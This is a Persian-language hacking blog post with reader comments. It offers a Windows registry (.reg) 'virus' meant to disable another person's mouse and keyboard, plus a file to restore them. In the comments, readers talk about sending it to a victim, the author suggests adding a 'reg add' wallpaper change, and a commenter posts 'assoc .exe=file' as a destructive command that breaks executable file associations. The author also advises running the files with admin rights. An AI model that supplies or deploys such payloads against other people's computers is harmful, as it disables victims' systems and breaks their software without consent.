غیرفعال کردن ماوس و کیبورد (ریجستری) :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

ویروس غیر فعال کردن موس

برای غیر فعال کردن موس و کیبورد راهکار های زیادی وجود داره

یکی از این روش ها غیر فعال کردن از طریق ریجستری ویندوز هستش که در ادامه در قالب یک فایل reg با آن آشنا میشیم
کدهایی که در ادامه قرار میدم رو توی نوت پد وارد کرده وبا فرمت reg ذخیره کنید

غیرفعال کردن
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\MouseKeys]
"Flags"="250"
فعال کردن
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\MouseKeys]
"Flags"="254"

نظر (۱۳)

لطفا تغییر رجیستری با پایتون هم اموزش بدید
Virus32 MR_C0D3R ‌ :
وقت کنم حتما میگم ولی تو نت هستا :( کتابخونه ی winreg_
کتاب خانه winreg توی اینترنت دیده بودم ولی اموزش استفاده ازش پیدا نکردم:(
Virus32 MR_C0D3R ‌ :
زدم تو لیست پست هایی که قراره ارسال بشه ، حتما یه آموزش تکمیلی میزارم
سلام میشه یه تیکه کد اول فایل های که با REG سیو شدن نوشت که خود به خود اجرا بشن؟
Virus32 MR_C0D3R ‌ :
سلام نه نمیشه
دادااش یه چیزی بگم ساید خندت بگیره بگی این اسکول کیه اما من اشتباهی تو یه پست دیگه در مورد پست گزاشتم ببخشید وقتتو میگرم
همش فکر می کنم همه مثل من بیکارن
می خواستم بگم من می خوام به این کد یه صفحه دیفیس بدم باید چه غلطی کنم اخه یه نفر هست هرچی ویروس برا اون بدبخت می فرستم اینم بفرستم تمام
Virus32 Virus 32 :
به این کد نمیتونی صفحه دیفیس بدی
یعنی میتونی ولی از نظر ما جالب نیست
بهتره به هر زبان برنامه نویسی که بلدی یه دیفیس بسازی و این کد رو به قول خودت بدی به صفحه دیفیست
در هر صورت با این روش ...
تنها چیزی که به ذهنم میرسه برای خودی نشون دادن میتونی علاوه بر غیر فعال کردن ماوس وکیبورد تصویر زمینه سیستم رو هم عوض کنی
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /f /t REG_SZ /d c:\images\Virus32.bmp
↑ اینم نسخه عوض کردن تصویر زمینه به کمک دستورات رجستری.
  • Virus32
  • علیرضا آهنی
  • این کد (cmd) از همه کد ها cmd قدرت تخریب بیشتری داره :))))

    assoc .exe=file
    Virus32 MR_C0D3R ‌ :
    :)
    سلام میبردم دیگه فعال نمیشه اگه دکه ها رو نگه داری کار میکنه
    سلام داش می خواستم بپرسم که این ویروس های کی می نویسین زبانش چیه
    Virus32 Virus 32 :
    سلام
    با زبان های مختلف نوشته شده
    تو هر پست زبانش هم اعلام شده
    مثلا اینجا از دستورات reg استفاده شده
    بیشتر bat و c++ و c#

    سلام کارنمیکنه

    Virus32 32 Attacker ‌ :
    سلام، با سطح دسترسی ادمین بازش کن.
  • Virus32
  • محمد صدرا عبدالعلی زاده
  • سلام.

    اگه این کد رو بزنیم نه کیبرو داریم نه موس

    چطوری میخوایم دوباره فعالش کنیم؟

    Virus32 32 Attacker ‌ :
    سلام عزیز، اول کد فعال کردنشو با پسوند bat سیو کن و کپی کن توو استارت آپ ویندوزت، بعد به یوزرت دسترسی ادمین بده، بعد کدشو تست کن، و بعد که ری استارت کنی، فایلی که ریختی توو استارت آپ باعث میشه دوباره موس و کیبوردت فعال بشه..

    سلام بیزحمت رمز ها رو بهم میگی

     

    Virus32 Attrib32 32 32 :
    جای مناسب درخواست ندادید

    سلام حاجی لطفا یه کمکی به من بکن,من دیشب با کامپیوتر رفتم تو یه چت روم گوگل هشدار داد امن نیست ولی من رفتم بعدش موس و کیبورد شروع کردن به لگ شدن و حالا کلا از کار افتادن,کیس رو دادم مادربورد رو تست کردن سالمه,بنظرت میتونه ویروس باشه؟اگه هست چیکار کنم با ویندوز زدن درست میشه؟

    Virus32 Ax0o 32 :
    سلام یه اسکن کلی داشته باشین و مشکلتونو واضح تر بگید ، بعد خروج سایت هم موس همونطوری بود؟

    خواستم شمارو مطلع کنم که عدد سه ویروس سی و دو از بالای صفحه وبلاگ پروندم

    خلاصه حلال کنید

    Virus32 Virus 32 :
    متوجه نشدم!

    سلام داداش میشه لطفا برای من یک ویروس اماده بدید که وقتی وارد ان میشون کامپیوتر خیلی بد جور هنگ کند  ببخشید میگم ویروس اماده بدید چون خودم زیاد بلد نیستم  

    Virus32 Virus 32 :
    سلام عزیز
    متاسفانه امکانش نیست!
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی